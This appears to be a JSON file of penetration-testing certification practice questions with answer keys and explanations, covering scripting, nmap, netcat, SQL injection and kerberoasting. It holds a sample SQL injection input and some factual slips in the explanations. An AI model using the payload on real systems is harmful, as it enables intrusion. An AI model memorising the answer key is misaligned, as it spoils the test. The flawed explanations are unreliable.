    "question": "Analyze the following segment of code:<br>for hst in range(0,256):<br>ip= net + str(hst)<br>print(ip, ': ', socket.gethostbyaddr(ip), '\\n')<br>In what language is this code written?",
    "choice_a": "Ruby",
    "choice_b": "PowerShell",
    "choice_c": "Python",
    "choice_d": "Bash",
    "correct_answer": "C",
    "explanation": "Use the flowchart in Figure shown below to answer this question. The code contains colons, so it is written in Python.<br><img src=\"/question_assets/PenTest+/285006_c12f002.png\"/>",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      308,
      329,
      321,
      156,
      11
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 229,
    "question": "What Unix command can you use to listen for input on a network port?",
    "choice_a": "<code>grep</code>",
    "choice_b": "<code>sed</code>",
    "choice_c": "<code>awk</code>",
    "choice_d": "<code>nc</code>",
    "correct_answer": "D",
    "explanation": "The <code>nc</code> command allows you to open a network port for listening and then direct the input received on that port to a file or an executable.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      250,
      309,
      331,
      286,
      162
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 230,
    "question": "Which one of the following programming languages does not offer a built-in robust error-handling capability?",
    "choice_a": "PowerShell",
    "choice_b": "Python",
    "choice_c": "Ruby",
    "choice_d": "Bash",
    "correct_answer": "D",
    "explanation": "PowerShell, Python, and Ruby all support variants of the <code>try..catch</code> clause. Bash does not provide a built-in error-handling capability.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      325,
      309,
      321,
      322,
      318
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 231,
    "question": "What value would be used to encode an ampersand in a URL string?",
    "choice_a": "<code>%24</code>",
    "choice_b": "<code>%25</code>",
    "choice_c": "<code>%26</code>",
    "choice_d": "<code>%27</code>",
    "correct_answer": "C",
    "explanation": "The <code>%26</code> value is used to URL-encode ampersands using the percent encoding scheme.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      320,
      319,
      226,
      209,
      162
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 232,
    "question": "What comparison operator tests to see if one number is greater than or equal to another number in Bash?",
    "choice_a": "<code>-gt</code>",
    "choice_b": "<code>-ge</code>",
    "choice_c": "<code>></code>",
    "choice_d": "<code>>=</code>",
    "correct_answer": "B",
    "explanation": "The <code>-ge</code> operator tests whether one value is greater than or equal to another value in Bash and PowerShell, whereas the <code>-gt</code> operator tests whether one value is strictly greater than the other. The <code>>=</code> and <code>></code> operators are used in Python for the same purposes.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      318,
      321,
      322,
      325,
      319
    ],
    "source": "285006_Ch12"
  },
  {
    "id": 269,
    "question": "Charles has compromised a Linux system and wants to capture traffic from the command line. What tool should he select?",
    "choice_a": "Wireshark",
    "choice_b": "netcat",
    "choice_c": "grep",
    "choice_d": "tcpdump",
    "correct_answer": "D",
    "explanation": "Charles will be most successful with tcpdump. Although you can capture packets with netcat, it provides far fewer built-in functions and wouldn\u2019t be the first choice for most penetration testers if they have a better option. Wireshark is a graphical tool, and grep is used for text searching, not packet capture.",
    "topic_id": 2,
    "practice_test_id": 1,
    "related_articles": [
      16,
      60,
      62,
      324,
      328
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 270,
    "question": "Lisa wants to hire a penetration tester to assess the security of her company’s main web application infrastructure. What type of assessment will be the most effective if time and cost is a concern?",
    "choice_a": "Unknown environment",
    "choice_b": "Domestic environment",
    "choice_c": "Known environment",
    "choice_d": "Foreign environment",
    "correct_answer": "C",
    "explanation": "A known environment (sometimes called a white box or crystal box) assessment is generally the most efficient, as it allows penetration testers to spend less time gaining knowledge and more time assessing the effectiveness of controls. Domestic and foreign environments are not typical classifications of penetration testing targets.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      24,
      23,
      29,
      8,
      17
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 271,
    "question": "Karen wants to use a wireless security tool to create a fake access point. Which of the common wireless security tools is best suited to this?",
    "choice_a": "Aircrack-ng",
    "choice_b": "Kismet",
    "choice_c": "WiFite",
    "choice_d": "AirShark",
    "correct_answer": "A",
    "explanation": "Aircrack-ng provides all of the tools required to conduct an evil-twin attack. Wifite and Kismet both have other useful wireless security tools, and AirShark was made up for this question.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      182,
      188,
      187,
      183,
      11
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 272,
    "question": "Ryan ran a vulnerability scan of one of his organization’s production systems during a penetration test and received the report shown in the following image. He would like to understand this vulnerability better, use it to gain further access, and then provide management with recommendations on remediating the issue.<br><img src=\"/question_assets/PenTest+/285006_peuf001.png\"/><br>Which one of the following protocols would Ryan use to exploit this vulnerability?",
    "choice_a": "SSH",
    "choice_b": "HTTPS",
    "choice_c": "FTP",
    "choice_d": "RDP",
    "correct_answer": "B",
    "explanation": "This vulnerability exists in Microsoft Internet Information Server (IIS), which is a web server. The fact that the vulnerability could result in cross-site scripting issues also points to a web server. Web servers use the HTTP and HTTPS protocols. An administrator seeking to block attackers from exploiting this issue could configure IPS rules to filter HTTP/HTTPS access to this server.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      226,
      219,
      11,
      215,
      156
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 273,
    "question": "Ryan ran a vulnerability scan of one of his organization’s production systems during a penetration test and received the report shown in the following image. He would like to understand this vulnerability better, use it to gain further access, and then provide management with recommendations on remediating the issue.<br>I <img src=\"/question_assets/PenTest+/285006_peuf001.png\"/><br>Which one of the following actions should Ryan recommend that management take to remediate the underlying issue without disrupting business activity?",
    "choice_a": "Disable the IIS service",
    "choice_b": "Apply a security patch",
    "choice_c": "Modify the web application",
    "choice_d": "Apply IPS rules",
    "correct_answer": "B",
    "explanation": "Applying a security patch would correct the issue on this server. The fact that the header for this vulnerability includes a Microsoft security bulletin ID (MS17-016) indicates that Microsoft likely released a patch in 2017. Disabling the IIS service would disrupt business activity on the server. Modifying the web application would not likely address this issue since the report indicates that it is an issue with the underlying IIS server and not a specific web application. IPS rules may prevent an attacker from exploiting the vulnerability, but they would not correct the underlying issue.",
    "topic_id": 1,
    "practice_test_id": 5,
    "related_articles": [
      298,
      295,
      305,
      297,
      292
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 274,
    "question": "John has been asked to notify his target organization of the specific times that his tests will occur during an unknown environment penetration test. After testing with limited success, he discovers that the system and security administrators were notified that he would be testing during that timeframe. What concern should John express to his employer?",
    "choice_a": "The test should be conducted after hours to test staff responses outside the business day.",
    "choice_b": "The system administrators may not accept the results of the test.",
    "choice_c": "The test may not represent typical behavior due to the administrators knowing about it.",
    "choice_d": "The test is valid and will provide more useful information about response capabilities due to the notification.",
    "correct_answer": "C",
    "explanation": "Penetration testers who discover that their target was notified of their testing when notification was not previously discussed may have to worry about their testing being spoiled. Administrators may have changed specific settings during the time the test occurred, and restored them after the fact\u2014the authors of this book have seen this happen, with administrators turning firewalls on during the testing time to make systems \u201cinvisible,\u201d and then turning them back off as soon as the test was over!",
    "topic_id": 1,
    "practice_test_id": 7,
    "related_articles": [
      31,
      37,
      24,
      289,
      36
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 275,
    "question": "Maria is preparing to conduct a penetration test and wants to follow a penetration testing standard. Which of the following standards is most useful for her to base her process and procedures on?",
    "choice_a": "OWASP",
    "choice_b": "OSSTMM",
    "choice_c": "ATT&CK",
    "choice_d": "NIST",
    "correct_answer": "B",
    "explanation": "The Open Source Security Testing Methodology Manual is the only standard from this list that is a penetration testing methodology. NIST is the National Institute for Standards and Technology and provides standards but isn\u2019t a standard itself. ATT&CK is a framework and knowledgebase used to track and classify adversary tactics and techniques. OWASP is the Open Web Application Security Project, a foundation that works to improve the security of software, particularly web applications.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      46,
      49,
      47,
      48,
      4
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 276,
    "question": "Shen is conducting a penetration test and discovers signs of a past intrusion on the system. What action should she take first?",
    "choice_a": "Document the evidence in her report.",
    "choice_b": "Notify management.",
    "choice_c": "Review the attack evidence and incorporate techniques in her own test.",
    "choice_d": "Eradicate all traces of the attack from the system.",
    "correct_answer": "B",
    "explanation": "Shen is ethically obligated to immediately report the signs of a prior attack or criminal activity to management. She should do this prior to conducting any other activity and should await instructions before resuming the test.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      38,
      4,
      18,
      30,
      301
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 277,
    "question": "Cameron is negotiating with a penetration testing organization and wants to create a document that details the deliverables and timelines that the vendor will use while providing the service. What type of document is he creating?",
    "choice_a": "An EULA",
    "choice_b": "An SOW",
    "choice_c": "An NDA",
    "choice_d": "An MSA",
    "correct_answer": "B",
    "explanation": "Cameron is creating a statement of work, which describes what will be done and the amount of time it will take to complete it. A EULA is an end-user license agreement, often associated with software. An NDA is a nondisclosure agreement, and an MSA is a master services agreement.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      31,
      37,
      26,
      18,
      4
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 278,
    "question": "Which one of the following is an example of a process control that might be suggested to remediate a penetration test finding?",
    "choice_a": "Firewall rule change",
    "choice_b": "Security awareness campaign",
    "choice_c": "DLP implementation",
    "choice_d": "Two-person control",
    "correct_answer": "D",
    "explanation": "Two-person control is an example of a business process that might be implemented as a security control. Firewall rule changes, and the implementation of a DLP system are examples of technical controls. A security awareness campaign is an example of a personnel control.",
    "topic_id": 1,
    "practice_test_id": 7,
    "related_articles": [
      292,
      295,
      296,
      305,
      290
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 279,
    "question": "Victor is attempting to penetrate a web application and sends the following input to the application:<br>Victor' AND 1=2;--<br>What type of SQL injection attack is Victor attempting?",
    "choice_a": "Standard SQL injection",
    "choice_b": "Blind content-based SQL injection",
    "choice_c": "Blind timing-based SQL injection",
    "choice_d": "Privileged SQL injection",
    "correct_answer": "B",
    "explanation": "The use of the statement 1=2, which always evaluates to false, is a sign of a content-based SQL injection attack. Standard SQL injection would not need to include this technique. Timing-based attacks would include a command that triggers a delay. Privileged SQL injection is not a normal category of exploit.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      203,
      202,
      201,
      204,
      226
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 280,
    "question": "Tim recently wrote a Bash script called <code>passwordcracker.sh</code> to perform password cracking. When he tried to execute the script during a penetration test, he received a permission denied error message. What command can Tim execute to correct this permission and allow only him, as the file’s owner, to execute the script?",
    "choice_a": "<code>chmod o+x passwordcracker.sh</code>",
    "choice_b": "<code>chmod u+x passwordcracker.sh</code>",
    "choice_c": "<code>chmod g+x passwordcracker.sh</code>",
    "choice_d": "<code>chmod a+x passwordcracker.sh</code>",
    "correct_answer": "B",
    "explanation": "The <code>chmod u+x</code> command adds execute permission for the file\u2019s owner. The other commands all grant different permissions. The <code>g+x</code> argument provides execute permission to members of the file\u2019s group. The <code>o+x</code> argument to <code>chmod</code> grants execute permission to everyone other the file\u2019s user or group. The <code>a+x</code> argument provides execute permission to everyone.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      309,
      308,
      243,
      174,
      11
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 281,
    "question": "Christopher is conducting a penetration test of an organization as part of an unknown environment assessment. He is currently testing a public-facing web application. Which one of the following software testing techniques will not be available to him?",
    "choice_a": "Static analysis",
    "choice_b": "Dynamic analysis",
    "choice_c": "Fuzz testing",
    "choice_d": "Vulnerability scanning",
    "correct_answer": "A",
    "explanation": "Christopher can easily conduct vulnerability scanning using a web application testing tool because the website is public-facing. This tool should be able to assist him with fuzz testing, which is a form of dynamic analysis. Christopher cannot, however, perform static analysis of the source code because he does not have access to that inside information as part of an unknown environment test.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      227,
      87,
      228,
      89,
      288
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 282,
    "question": "MCDS, Inc. uses Microsoft’s Azure cloud to host their primary website and e-commerce infrastructure. Steve has been asked to include both cloud-hosted environments in a penetration test he is conducting. What step is critical to ensuring he has proper authorization to conduct scans of the cloud-hosted systems?",
    "choice_a": "He needs administrative rights for the Azure environment.",
    "choice_b": "He needs sign-off from the lead or manager of the infrastructure team.",
    "choice_c": "He needs authorization from the third-party provider.",
    "choice_d": "He needs authorization from the organization\u2019s ISP.",
    "correct_answer": "C",
    "explanation": "Steve needs authorization from the cloud service provider. In most cases, third-party providers require prior authorization for penetration testing or other efforts that may cause issues for other users of their shared infrastructure or that may register as attacks against systems or services they host. Some simply don\u2019t allow penetration tests, whereas others may have specific requirements for penetration testers.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      35,
      32,
      18,
      37,
      31
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 283,
    "question": "Tiffany wants to gather OSINT data about the services that specific systems run in her target organization. Which of the following tools will not allow her to do this?",
    "choice_a": "Censys",
    "choice_b": "nmap",
    "choice_c": "Shodan",
    "choice_d": "theHarvester",
    "correct_answer": "B",
    "explanation": "Censys, Shodan, and theHarvester will all allow Tiffany to conduct OSINT information gathering that does not actively scan her target. Nmap is an active scanning tool and will not allow her to gather this type of information without connecting to the target systems and networks.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      53,
      58,
      65,
      69,
      72
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 284,
    "question": "Jack performs a scan using the command <code>nmap 10.11.45.0/24</code>. How many TCP ports will he scan?",
    "choice_a": "512",
    "choice_b": "1,000",
    "choice_c": "1,024",
    "choice_d": "65,535",
    "correct_answer": "B",
    "explanation": "By default, nmap will scan the most 1,000 most common TCP and UDP ports if it is not used with a command flag that provides it with a range of ports.",
    "topic_id": 2,
    "practice_test_id": 6,
    "related_articles": [
      65,
      16,
      73,
      10,
      66
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 285,
    "question": "What happens in a double-tagging attack after the tagged packet arrives at the first switch?",
    "choice_a": "The switch reads both tags and forwards the packet to the VLAN listed in the first tag.",
    "choice_b": "The switch reads both tags and forwards the packet to the VLAN listed in the second tag.",
    "choice_c": "The switch forwards the packet to the VLAN listed in the first tag and removes it.",
    "choice_d": "The switch forwards the packet to the VLAN listed in the second tag and removes it.",
    "correct_answer": "C",
    "explanation": "Double tagging relies on the fact that trunking is enabled on the target switch and that it will read the first tag and forward the packet to that VLAN after removing the tag. The next switch will see only the second tag (now the only tag) and will treat it like a normally tagged packet for that VLAN.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      158,
      11,
      162,
      286,
      331
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 286,
    "question": "MCDS, Inc. is concerned about confidential business information that penetration testers may encounter during their engagement. What type of agreement should they ask the penetration testers to sign to help protect the confidentiality of that information?",
    "choice_a": "A contract",
    "choice_b": "An NDA",
    "choice_c": "An NADA",
    "choice_d": "An MSA",
    "correct_answer": "B",
    "explanation": "A nondisclosure agreement (NDA) helps protect confidential information that a contractor or employee may encounter during the course of their work. Penetration testers commonly sign NDAs as part of the requirements for an engagement. Although a contract may be helpful, an NDA specifically covers the confidentiality of the information encountered and typically sets forth specific penalties and requirements for handling that information.",
    "topic_id": 1,
    "practice_test_id": 3,
    "related_articles": [
      31,
      37,
      36,
      38,
      18
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 287,
    "question": "Which one of the following methods is <i>not</i> used to obtain user session cookies during a penetration test?",
    "choice_a": "On-path attack",
    "choice_b": "Malware",
    "choice_c": "Network eavesdropping",
    "choice_d": "Tailgating",
    "correct_answer": "D",
    "explanation": "Tailgating is used to obtain physical access to a facility and can\u2019t be used to obtain session cookies. Penetration testers seeking to obtain a session cookie may steal it by performing an on-path attack, conducting network eavesdropping, or installing malware on the target user\u2019s system.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      208,
      159,
      162,
      194,
      195
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 288,
    "question": "Ann is performing a kerberoasting attack and has scanned for user accounts with SPNs set and had requested service tickets using SPNs. What should she do next?",
    "choice_a": "Send service tickets to the server.",
    "choice_b": "Extract the service tickets from memory and save them.",
    "choice_c": "Insert NTLM hashes into the service tickets to authenticate.",
    "choice_d": "Conduct an offline brute-force attack against the SPNs.",
    "correct_answer": "B",
    "explanation": "The next step in Ann\u2019s attack is to extract the service tickets from memory and to save them to a file. Then she can use an offline brute-force attack against the passwords in the service tickets.",
    "topic_id": 4,
    "practice_test_id": null,
    "related_articles": [
      172,
      243,
      174,
      245,
      241
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 289,
    "question": "Which one of the following combinations of authentication techniques is an example of multifactor authentication?",
    "choice_a": "Username and password",
    "choice_b": "Security question and PIN",
    "choice_c": "ID card and fingerprint",
    "choice_d": "ID card and smartphone app",
    "correct_answer": "C",
    "explanation": "An ID card is an example of \u201csomething you have\u201d and a fingerprint is \u201csomething you are,\u201d so that scheme qualifies as multifactor authentication. A username is an identification mechanism, not an authentication mechanism. Security questions and PINs are both \u201csomething you know,\u201d so they do not constitute multifactor authentication when used together. ID cards and smartphone apps are both examples of \u201csomething you have.\u201d.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      225,
      83,
      189,
      143,
      232
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 290,
    "question": "Richard is conducting network reconnaissance as part of a penetration test and would like to use a tool that allows him to scan the entire network and identify potential vulnerabilities on servers in the target organization. Which one of the following tools would meet Richard’s needs?",
    "choice_a": "Wireshark",
    "choice_b": "Metasploit",
    "choice_c": "Nessus",
    "choice_d": "Kismet",
    "correct_answer": "C",
    "explanation": "Nessus is a popular network vulnerability scanning tool that would meet Richard\u2019s requirements. The other tools listed do not perform network vulnerability scanning. Nmap is a port scanner that only reports open ports, not vulnerabilities. Metasploit is an exploitation framework useful in later phases of the penetration test.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      84,
      173,
      13,
      119,
      94
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 291,
    "question": "Kai is performing a penetration test and his client is concerned about potential disruption of business operations. What common rule of engagement might Kai suggest?",
    "choice_a": "Allowing all tests",
    "choice_b": "Location restrictions",
    "choice_c": "Time-of-day restrictions",
    "choice_d": "Disallowing all tests",
    "correct_answer": "C",
    "explanation": "Time-of-day restrictions are commonly used to avoid business disruption. Kai may suggest that testing be done off hours or during specific windows. Allowing all tests is not a limitation, and disallowing all tests would stop the penetration test from being useful. Location restrictions are typically not useful for limiting or preventing business disruption.",
    "topic_id": 1,
    "practice_test_id": 6,
    "related_articles": [
      26,
      299,
      30,
      289,
      17
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 292,
    "question": "The company that Greg works for has recently undergone a penetration test, and the pentesters discovered that employees did not have appropriate separation of duties. Which of the following operational controls is not helpful when attempting to address this finding?",
    "choice_a": "Job rotation",
    "choice_b": "Time-of-day restrictions",
    "choice_c": "Mandatory vacation",
    "choice_d": "User training",
    "correct_answer": "B",
    "explanation": "Separation of duties is intended to ensure that a single individual cannot take inappropriate actions. Time-of-day restrictions do not help with separation of duties, but they do help prevent staff or members or penetration testers from using credentials after hours. That means that job rotation and mandatory vacations are useful because they can offer a chance for malfeasance to be discovered. User training can also help by ensuring that staff members know what is expected of them and what is not allowed.",
    "topic_id": 1,
    "practice_test_id": 3,
    "related_articles": [
      292,
      293,
      26,
      298,
      305
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 293,
    "question": "Examine the following code snippet, used to create a URL:<br><code>$ip = \"10.5.5.2\"</code><br><code>$port = \"80\"</code><br><code>$url = \"http://\" + $ip + \":\" + $port</code><br>What language is being used?",
    "choice_a": "Python",
    "choice_b": "Ruby",
    "choice_c": "PowerShell",
    "choice_d": "Bash",
    "correct_answer": "C",
    "explanation": "The use of dollar signs to prefix variable names signals that this is code written in PowerShell. Ruby and Python also use the <code>+</code> operator for concatenation.",
    "topic_id": 4,
    "practice_test_id": 7,
    "related_articles": [
      308,
      319,
      311,
      322,
      321
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 294,
    "question": "Matthew is writing the report from a penetration test and would like to communicate his results using standard language. Which one of the following components of the NIST Security Content Automation Protocol (SCAP) can he use to describe security flaws in a standardized way?",
    "choice_a": "CPE",
    "choice_b": "CVSS",
    "choice_c": "CCE",
    "choice_d": "CVE",
    "correct_answer": "D",
    "explanation": "The Common Vulnerabilities and Exposures (CVE) standard provides a consistent way to describe security flaws. The Common Vulnerability Scoring System (CVSS) also involves vulnerabilities but provides a standardized way to discuss vulnerability severity, not the vulnerabilities themselves. Common Platform Enumeration (CPE) is used to provide a standard nomenclature for describing product names and versions. Common Configuration Enumeration (CCE) provides a standard nomenclature for discussing system configuration issues.",
    "topic_id": 1,
    "practice_test_id": 4,
    "related_articles": [
      296,
      49,
      298,
      304,
      305
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 295,
    "question": "What information is most important to target selection for wireless networks?",
    "choice_a": "The wireless standard (G, N, AC) used by the organization",
    "choice_b": "The SSIDs that belong to the target company",
    "choice_c": "The EMEI number associated with the access points",
    "choice_d": "Whether the network uses WPA2 or WEP",
    "correct_answer": "B",
    "explanation": "Selecting the correct target is critical to a penetration test, and that requires you to know the SSIDs used by the target. If you conduct penetration testing activities against a network that you are not authorized to attack, you may be breaking the law and could cause unintended harm to an organization that you don\u2019t have a contract with!",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      4,
      18,
      36,
      37,
      19
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 296,
    "question": "Joe is conducting a network vulnerability scan against his data center and receives reports from system administrators that the scans are slowing down their systems. There are only performance problems on individual hosts and no network connectivity issues. He looks at the scan settings shown here. <br><img src=\"/question_assets/PenTest+/285006_peuf002.png\"/><br>Which setting would be most likely to correct the problem?",
    "choice_a": "Scan IP addresses in a random order",
    "choice_b": "Network timeout (in seconds)",
    "choice_c": "Max simultaneous checks per host",
    "choice_d": "Max simultaneous hosts per scan",
    "correct_answer": "C",
    "explanation": "Of the choices presented, the maximum number of simultaneous checks per host is the only setting that would positively affect individual systems. Changing the number of simultaneous hosts per scan and the network timeout would have an effect on the broader network. Randomizing IP addresses would not have a performance impact.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      104,
      80,
      76,
      85,
      103
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 297,
    "question": "After compromising a user account on a Linux system, Ben discovers that he is unable to change directories and that he can’t set path or shell variables or redirect output. What has he most likely encountered?",
    "choice_a": "The account is not on the sudoers list.",
    "choice_b": "The account is a service account.",
    "choice_c": "The account is using a restricted shell.",
    "choice_d": "The account is not a valid user account.",
    "correct_answer": "C",
    "explanation": "Ben\u2019s first guess should be that the account he has gained access to is using a restricted shell. Restricted shells commonly prevent users from changing directories, setting <code>PATH</code> or <code>SHELL</code> variables, specifying absolute pathnames, and redirecting output.",
    "topic_id": 4,
    "practice_test_id": 3,
    "related_articles": [
      233,
      237,
      236,
      254,
      234
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 298,
    "question": "Charles wants to set up a scheduled task on a Linux system. What tool should he use?",
    "choice_a": "<code>cron</code>",
    "choice_b": "<code>at</code>",
    "choice_c": "<code>timed</code>",
    "choice_d": "<code>sched</code>",
    "correct_answer": "A",
    "explanation": "The Linux <code>cron</code> command is used to set up scheduled tasks. The <code>at</code> command is used for Windows systems, and both <code>timed</code> and <code>sched</code> were made up for this question.",
    "topic_id": 5,
    "practice_test_id": 3,
    "related_articles": [
      141,
      150,
      15,
      12,
      138
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 299,
    "question": "Mike is conducting a penetration test and is using the results of an internal network vulnerability scan to guide his work. He is conducting his test from an external location. The report shows that a web application has a SQL injection vulnerability. He can access the web server but cannot exploit the vulnerability successfully. What is the least likely cause of Mike’s inability to exploit the vulnerability?",
    "choice_a": "A network firewall is blocking access to the server.",
    "choice_b": "An intrusion prevention system is detecting the attempt and blocking it.",
    "choice_c": "Administrators already remediated the vulnerability.",
    "choice_d": "A web application firewall is filtering the request.",
    "correct_answer": "A",
    "explanation": "If a network firewall were blocking access to the server, Mike would not be able to access the application at all. However, an intrusion prevention system or web application firewall might allow normal access to the server but block attempts to conduct a SQL injection attack. It is also possible that administrators detected and remediated the vulnerability before Mike attempted his exploit.",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      205,
      203,
      11,
      202,
      201
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 300,
    "question": "Anand has discovered the following exploit code. What language is it written in and what does it do?<br><code>import requests</code><br><code>url = 'https://example.com/example.txt'</code><br><code>data = requests.get(url, allow_redirects=True)</code><br><code>open('example.txt', 'wb').write(data.content)</code>",
    "choice_a": "Perl, file upload",
    "choice_b": "JavaScript, file download",
    "choice_c": "Ruby, file upload",
    "choice_d": "Python, file download",
    "correct_answer": "D",
    "explanation": "This is a simple Python file download script. You can see it defines a request and then opens it to write the content to a file from a URL.",
    "topic_id": 4,
    "practice_test_id": 5,
    "related_articles": [
      311,
      308,
      331,
      321,
      325
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 301,
    "question": "Ralph discovers a file containing hashed passwords during a penetration test but is able to crack 90 percent of them using Jack the Ripper. What finding should Ralph report in his final report?",
    "choice_a": "Plain-text passwords",
    "choice_b": "Weak password encryption",
    "choice_c": "Weak password complexity",
    "choice_d": "No multifactor authentication",
    "correct_answer": "C",
    "explanation": "The only conclusion Ralph can reach from the information available is that the organization does not have a strong password complexity policy. If they did, the percentage of cracked passwords would be much lower. The scenario indicates that the passwords are hashed, so they are neither stored in plain text nor encrypted. We do not know from the information given whether multifactor authentication is in use.",
    "topic_id": 1,
    "practice_test_id": 5,
    "related_articles": [
      293,
      292,
      296,
      305,
      299
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 302,
    "question": "Examine the following object. What language was most likely used for this object? <br><code>{</code><br><code>      \"system\": {</code><br><code>             \"hostname\":\"www.certmike.com\",</code><br><code>             \"ip\": \"54.174.107.98\",</code><br><code>             \"security_scanned\": true</code><br><code>             }</code><br><code>}</code>",
    "choice_a": "JSON",
    "choice_b": "XML",
    "choice_c": "HTML",
    "choice_d": "SQL",
    "correct_answer": "A",
    "explanation": "This is an example of a JavaScript Object Notation (JSON) object. We can determine this by noting that it uses the key-value store format to define attributes. The object lacks the <code><></code> and <code></></code> tags that would be found in a markup language like XML or HTML. It is not a database query written in Structured Query Language (SQL).",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      312,
      317,
      328,
      327,
      324
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 303,
    "question": "Conducting a social engineering exercise against his target, Greg tells a story claiming that only a few members of the staff will be recognized for assisting with the project he is working on. What motivation technique has he used?",
    "choice_a": "Authority",
    "choice_b": "Scarcity",
    "choice_c": "Urgency",
    "choice_d": "Likeness",
    "correct_answer": "B",
    "explanation": "Scarcity-based persuasion focuses on limited rewards or opportunities. This can sound similar to urgency-based efforts, which focus on limited time. Appeals to authority leverage making the target believe that you have the right or role to require them to perform an action, whereas likeness uses similarity with the penetration tester to build trust.",
    "topic_id": 4,
    "practice_test_id": 1,
    "related_articles": [
      194,
      196,
      11,
      195,
      200
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 304,
    "question": "Orlando is writing a PowerShell script and tests the TCP ports open on a system using the following syntax:<br>port -lt 80 <br>Which of the following ports would match this expression?",
    "choice_a": "22",
    "choice_b": "80",
    "choice_c": "443",
    "choice_d": "All of the above",
    "correct_answer": "A",
    "explanation": "The <code>-lt</code> operator says that the variable on the left must be strictly less than the variable on the right. Port 22 is the only port that is strictly less than 80.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      316,
      313,
      312,
      314,
      324
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 305,
    "question": "Analyze the following segment of code:<br>if server == 1 <br>ip = '10.1.1.1'<br>elsif server == 2 <br>ip = '10.1.1.2'<br>else <br>ip = '10.1.1.3'<br>end <br>What language is this code written in?",
    "choice_a": "Ruby",
    "choice_b": "Bash",
    "choice_c": "Python",
    "choice_d": "PowerShell",
    "correct_answer": "A",
    "explanation": "We can analyze this code using the flowchart shown in this figure. Following this chart, we can quickly determine that the code is written in Ruby due to the use of the <code>end</code> statement.<br><img src=\"/question_assets/PenTest+/285006_peuf003.png\"/>",
    "topic_id": 4,
    "practice_test_id": 4,
    "related_articles": [
      321,
      308,
      329,
      3,
      223
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 306,
    "question": "Which of the following programming languages will generate an error if the script attempts to concatenate a string and an integer without first performing an explicit conversion?",
    "choice_a": "Bash",
    "choice_b": "Ruby",
    "choice_c": "PowerShell",
    "choice_d": "All of the above",
    "correct_answer": "B",
    "explanation": "Bash and PowerShell both allow the concatenation of strings and integers without an explicit conversion. Ruby (and Python) will generate an error if this is attempted.",
    "topic_id": 4,
    "practice_test_id": 6,
    "related_articles": [
      319,
      308,
      322,
      318,
      309
    ],
    "source": "285006_Practice Exam"
  },
  {
    "id": 307,
    "question": "Kaiden is in the process of penetration testing a web application belonging to his target organization. He would like to use a tool specifically designed to perform automated web application testing. Which one of the following tools is best suited for this task?",
    "choice_a": "Immunity",
    "choice_b": "Nikto",
    "choice_c": "ZAP",
    "choice_d": "Metasploit",
    "correct_answer": "B",
